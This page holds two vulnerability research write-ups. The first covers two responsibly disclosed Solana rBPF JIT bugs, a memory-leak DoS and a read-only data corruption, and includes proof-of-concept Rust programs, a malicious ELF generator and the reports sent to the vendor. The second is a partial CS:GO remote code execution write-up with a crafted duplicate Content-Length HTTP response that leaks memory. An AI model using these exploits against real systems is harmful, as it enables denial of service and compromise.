Normal view

There are new articles available, click to refresh the page.
Before yesterdaysecret club

Earn $200K by fuzzing for a weekend: Part 2

By: addison
11 May 2022 at 08:00

Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.

In part 1, I discussed the development of the fuzzers. Here, I will discuss the vulnerabilities as I discovered them and the process of reporting them to Solana.

Bug 1: Resource exhaustion

The first bug I reported to Solana was exceptionally tricky; it only occurs in highly specific circumstances, and the fact that the fuzzer discovered it at all is a testament to the incredible complexity of inputs a fuzzer can discover through repeated trials. The relevant crash was found in approximately two hours of fuzzer start.

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
  r0 = r0 + 255
  if r0 <= 8355838 goto -2
  r9 = r3 >> 3
  call -1

For whatever reason, this particular set of instructions causes a memory leak.

When executed, this program does the following steps, roughly:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error

What stood out to me about this particular test case is how incredibly specific it was; varying the addition of 255 or 8355838 by even a small amount caused the leak to disappear. It was then I remembered the following line from my fuzzer:

let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };

remaining, here, refers to the number of instructions remaining before the program is forceably terminated. As a result, the leaking program was running out this meter at exactly the call instruction.

A faulty optimisation

There is a wall of text at line 420 of jit.rs which suitably describes an optimisation that Solana applied in order to reduce the frequency at which they need to update the instruction meter.

The short version is that they only update or check the instruction meter when they reach the end of a block or a call in order to reduce the amount of times they update and check the meter. This optimisation is totally reasonable; we don’t care if we run out of instructions at the middle of a block because the subsequent instructions are still “safe”, and if we ever hit an exit that’s the end of a block anyway. In other words, this optimisation should have no effect on the final state of the program.

The issue can be seen in the patch for the vulnerability, where the maintainer moved line 1279 to line 1275. To understand why that’s relevant, let’s walk through our execution again:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
    • our meter updates here
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error, but that doesn’t happen because our meter updates here and emits a max instructions exceeded error

However, based on the original order of the instructions, what happens in the call is the following:

  1. invoke the call, which fails because the symbol is unresolved
  2. to report the unresolved symbol, we invoke that report_unresolved_symbol function, which returns the name of the symbol invoked (or “Unknown”) in a heap-allocated string
  3. the pc is updated
  4. the instruction count is validated, which overwrites the unresolved symbol error and terminates execution

Because the unresolved symbol error is merely overwritten, the value is never passed to the Rust code which invoked the JIT program. As a result, the reference to the heap-allocated String is lost and never dropped. Thus: any pointer to that heap allocation is lost and will never be freed, leading to the leak.

That being said, the leak is only seven bytes per execution of the program. Without causing a larger leak, this isn’t particularly exploitable.

Weaponisation

Let’s take a closer look at report_unresolved_symbol.

report_unresolved_symbol source
pub fn report_unresolved_symbol(&self, insn_offset: usize) -> Result<u64, EbpfError<E>> {
    let file_offset = insn_offset
        .saturating_mul(ebpf::INSN_SIZE)
        .saturating_add(self.text_section_info.offset_range.start as usize);

    let mut name = "Unknown";
    if let Ok(elf) = Elf::parse(self.elf_bytes.as_slice()) {
        for relocation in &elf.dynrels {
            match BpfRelocationType::from_x86_relocation_type(relocation.r_type) {
                Some(BpfRelocationType::R_Bpf_64_32) | Some(BpfRelocationType::R_Bpf_64_64) => {
                    if relocation.r_offset as usize == file_offset {
                        let sym = elf
                            .dynsyms
                            .get(relocation.r_sym)
                            .ok_or(ElfError::UnknownSymbol(relocation.r_sym))?;
                        name = elf
                            .dynstrtab
                            .get_at(sym.st_name)
                            .ok_or(ElfError::UnknownSymbol(sym.st_name))?;
                    }
                }
                _ => (),
            }
        }
    }
    Err(ElfError::UnresolvedSymbol(
        name.to_string(),
        file_offset
            .checked_div(ebpf::INSN_SIZE)
            .and_then(|offset| offset.checked_add(ebpf::ELF_INSN_DUMP_OFFSET))
            .unwrap_or(ebpf::ELF_INSN_DUMP_OFFSET),
        file_offset,
    )
    .into())
}

Note how the name is the string which becomes heap allocated. The value of the name is determined by a relocation lookup in the ELF, which we can actually control if we compile our own malicious ELF. Even though the fuzzer only tests the JIT operations, one of the intended ways to load a BPF program is as an ELF, so it seems like something that would certainly be in scope.

Crafting the malicious ELF

To create an unresolved relocation in BPF, it’s actually quite simple. We just need to create a function with a very, very long name that isn’t actually defined, only declared. To do so, I created two files to craft the malicious ELF:

evil.h

evil.h is far too large to post here, as it has a function name that is approximately a mebibyte long. Instead, it was generated with the following bash command.

$ echo "#define EVIL do_evil_$(printf 'a%.0s' {1..1048576})

void EVIL();
" > evil.h
evil.c
#include "evil.h"

void entrypoint() {
  asm("	goto +0\n"
      "	r0 = 0\n");
  EVIL();
}

Note that goto +0 is used here because we’ll use a specialised instruction meter that only can do two instructions.

Finally, we’ll also make a Rust program to load and execute this ELF just to make sure the maintainers are able to replicate the issue.

elf-memleak.rs

You won’t be able to use this particular example anymore as rBPF has changed a lot of its API since the time this was created. However, you can check out version v0.22.21, which this exploit was crafted for.

Note in particular the use of an instruction meter with two remaining.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;

use solana_rbpf::{elf::{Executable, register_bpf_function}, insn_builder::IntoBytes, vm::{Config, EbpfVm, TestInstructionMeter, SyscallRegistry}, user_error::UserError};
use solana_rbpf::insn_builder::{Arch, BpfCode, Cond, Instruction, MemSize, Source};

use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::verifier::check;

fn main() {
    let mut file = File::open("tests/elfs/evil.so").unwrap();
    let mut elf = Vec::new();
    file.read_to_end(&mut elf).unwrap();
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut syscall_registry = SyscallRegistry::default();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscall_registry).unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        for _ in 0.. {
            let mut jit_mem = [0; 65536];
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 2 };
            jit_vm.execute_program_jit(&mut jit_meter).ok();
        }
    }
}

With our malicious ELF that has a function name that’s a mebibyte long, the report_unresolved_symbol will set that name variable to the long function name. As a result, the allocated string will leak a whole mebibyte of memory per execution rather than the measly seven bytes. When performed in this loop, the entire system’s memory will be exhausted in mere moments.

Reporting

Okay, so now that we’ve crafted the exploit, we should probably report it to the vendor.

A quick Google later and we find the Solana security policy. Scrolling through, it says:

DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.

Okay, reasonable enough. Looks like they have bug bounties too!

DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)

Woah. I was working on rBPF out of curiosity, but it seems that there’s quite a bounty made available here.

I sent in my bug report via email on January 31st, and, within just three hours, Solana acknowledged the bug. Below is the report as submitted to Solana:

Report for bug 1 as submitted to Solana

There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.

The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.

The following eBPF program demonstrates the vulnerability:

entrypoint:
    goto +0
    r0 = 0
    call -1

where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.

The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.

While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.

Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.

Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.

For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k.

Bug 2: Persistent .rodata corruption

The second bug I reported was easy to find, but difficult to diagnose. While the bug occurred with high frequency, it was unclear as to what exactly what caused the bug. Past that, was it even exploitable or useful?

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
    or32 r9, -1
    mov32 r1, -1
    stxh [r9+0x1], r0
    exit

The crash type triggered was a difference in JIT vs interpreter exit state; JIT terminated with Ok(0), whereas interpreter terminated with:

Err(AccessViolation(31, Store, 4294967296, 2, "program"))

Spicy stuff. Looks like our JIT implementation has some form of out-of-bounds write. Let’s investigate a bit further.

The first thing of note is the access violation’s address: 4294967296. In other words, 0x100000000. Looking at the Solana documentation, we see that this address corresponds to program code. Are we writing to JIT’d code??

The answer, dear reader, is unfortunately no. As exciting as the prospect of arbitrary code execution might be, this actually refers to the BPF program code – more specifically, it refers to the read-only data present in the ELF provided. Regardless, it is writing to a immutable reference to a Vec somewhere that represents the program code, which is supposed to be read-only.

So why isn’t it?

The curse of x86

Let’s make our payload more clear and execute directly, then pop it into gdb to see exactly what code the JIT compiler is generating. I used the following program to test for OOB write:

oob-write.rs

This code likely no longer works due to changes in the API of rBPF changing in recent releases. Try it in examples/ in v0.2.22, where the vulnerability is still present.

use std::collections::BTreeMap;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        Arch,
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
        Source,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();
}

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    code
        .load(MemSize::DoubleWord).set_dst(9).push()
        .load(MemSize::Word).set_imm(1).push()
        .store_x(MemSize::HalfWord).set_dst(9).set_off(0).set_src(0).push()
        .exit().push();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    dump_insns(&executable);
    let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);
    }
}

This just sets up and executes the following BPF assembly:

entrypoint:
    lddw r9, 0x100000000
    stxh [r9+0x0], r0
    exit

This assembly simply writes a 0 to 0x100000000.

For the next part: please, for the love of god, use GEF.

$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤  break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤  run
gef➤  print self.executable.ro_section.buf.ptr.pointer 
gef➤  awatch *$1 # break if we modify the readonly section
gef➤  record full # set up for reverse execution
gef➤  continue

After that last continue, we effectively execute until we hit the write access to our read-only section. Additionally, we can step backwards in the program until we find our faulty behaviour.

The watched memory is written to as a result of this X86 store instruction (as a reminder, we this is the branch for stxh). Seeing this emit_address_translation call above it, we can determine that that function likely handles the address translation and readonly checks.

Further inspection shows that emit_address_translation actually emits a call to… something:

emit_call(jit, TARGET_PC_TRANSLATE_MEMORY_ADDRESS + len.trailing_zeros() as usize + 4 * (access_type as usize))?;

Okay, so this is some kind of global offset for this JIT program to translate the memory address. By searching for TARGET_PC_TRANSLATE_MEMORY_ADDRESS elsewhere in the program, we find a loop which initialises different kinds of memory translations.

Scrolling through this, we find our access check:

X86Instruction::cmp_immediate(OperandSize::S8, RAX, 0, Some(X86IndirectAccess::Offset(25))).emit(self)?; // region.is_writable == 0

Okay – so the x86 cmp instruction to find is one that uses a destination of [rax+0x19]. A couple rsi later to find such an instruction and we find:

cmp    DWORD PTR [rax+0x19], 0x0

Which is, notably, not using an 8-bit operand as the cmp_immediate call suggests. So what’s going on here?

x86 cmp operand size woes

Here is the definition of X86Instruction::cmp_immediate:

pub fn cmp_immediate(
    size: OperandSize,
    destination: u8,
    immediate: i64,
    indirect: Option<X86IndirectAccess>,
) -> Self {
    Self {
        size,
        opcode: 0x81,
        first_operand: RDI,
        second_operand: destination,
        immediate_size: OperandSize::S32,
        immediate,
        indirect,
        ..Self::default()
    }
}

This creates an x86 instruction with the opcode 0x81. Inspecting closer and cross-referencing with an x86-64 opcode reference, you can find that opcode 0x81 is only defined for 16-, 32-, and 64-bit register operands. If you want to use an 8-bit register operand, you’ll need to use the 0x80 opcode variant.

This is precisely the patch applied.

A quick side note about testing code with different compilers

This bug actually was a bit weirder than it seems at first. Due to differences in Rust struct padding between versions, at the time that I reported the bug, the difference was spurious in stable release. As a result, it’s quite likely that no one would have noticed the bug until the next Rust release version.

From my report:

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

Proof of concept

Alright, now to create a PoC so that the people inspecting the bug can validate it. Like last time, we’ll create an ELF, along with a few different demonstrations of the effects of the bug. Specifically, we want to demonstrate that read-only values in the BPF target can be modified persistently, as our writes affect the executable and thus all future executions of the JIT program.

value_in_ro.c

This program should fail, as the data to be overwritten should be read-only. It will be executed by howdy.rs.

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}
howdy.rs

This program loads the compiled version of value_in_ro.c and attaches a log syscall so that we can see the behaviour internally. I confirmed that this syscall did not affect the runtime behaviour.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::{InstructionMeter, SyscallObject};

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf);
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call);
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

This program, when executed, has the following output:

howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!

These first two files demonstrate the ability to overwrite the readonly data present in binaries persistently. Notice that we actually execute the JIT’d code multiple times, yet our changes to the value in data are persistent.

Implications

Suppose that there was a faulty offset or a user-controlled offset present in a BPF-based on-chain program. A malicious user could modify the readonly data of the program to replace certain contexts. In the best case scenario, this might lead to DoS of the program. In the worst case, this could lead to the replacement of fund amounts, of wallet addresses, etc.

Reporting

Having assembled my proof-of-concepts, my implications, and so on, I sent in the following report to Solana on February 4th:

Report for bug 2 as submitted to Solana

An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.

value_in_ro.c (.so available upon request)
typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}
analysis-corruption.rs
use std::collections::BTreeMap;

use solana_rbpf::elf::Executable;
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::insn_builder::BpfCode;
use solana_rbpf::insn_builder::Instruction;
use solana_rbpf::insn_builder::IntoBytes;
use solana_rbpf::insn_builder::MemSize;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", true).unwrap();
    let mut code = BpfCode::default();
    code
        .load(MemSize::DoubleWord).set_dst(0).set_imm(0).push()
        .load(MemSize::Word).set_imm(1).push()
        .store(MemSize::DoubleWord).set_dst(0).set_off(0).set_imm(0).push()
        .exit().push();
    let prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let jit_res = {
        let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
        let res = jit_vm.execute_program_jit(&mut jit_meter);
        let jit_tracer = jit_vm.get_tracer();
        let analysis = Analysis::from_executable(&executable);
        let stderr = std::io::stderr();
        jit_tracer.write(&mut stderr.lock(), &analysis).unwrap();
        res
    };
    eprintln!("{} => {:?}", 1, jit_res);
}
howdy.rs
use std::fs::File;
use std::io::Read;

use solana_rbpf::elf::Executable;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallObject;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

The bug was patched in a mere 4 hours.

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k. I disagreed strongly with this classification, but Solana said that due to the low likelihood of the exploitation of this bug (requiring a vulnerability in the on-chain program) they would offer $100k instead of the originally suggested $1m or $400k. They would not move on this point.

However, I would offer that (was that the actually basis for bug classification) that they should update their Security Policy to reflect that meaning. It was obviously very disappointing to hear that they would not be offering the bounty I expected given the classification categories provided.

Okay, so what’d you do with the money??

It would be bad form of me to not explain the incredible flexibility shown by Solana in terms of how they handled my payout. I intended to donate the funds to the Texas A&M Cybersecurity Club, at which I gained a lot of the skills necessary to perform this research and these exploits, and Solana was very willing to sidestep their listed policy and donate the funds directly in USD rather than making me handle the tokens on my own, which would have dramatically affected how much I could have donated due to tax. So, despite my concerns regarding their policy, I was very pleased with their willingness to accommodate my wishes with the bounty payout.

Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

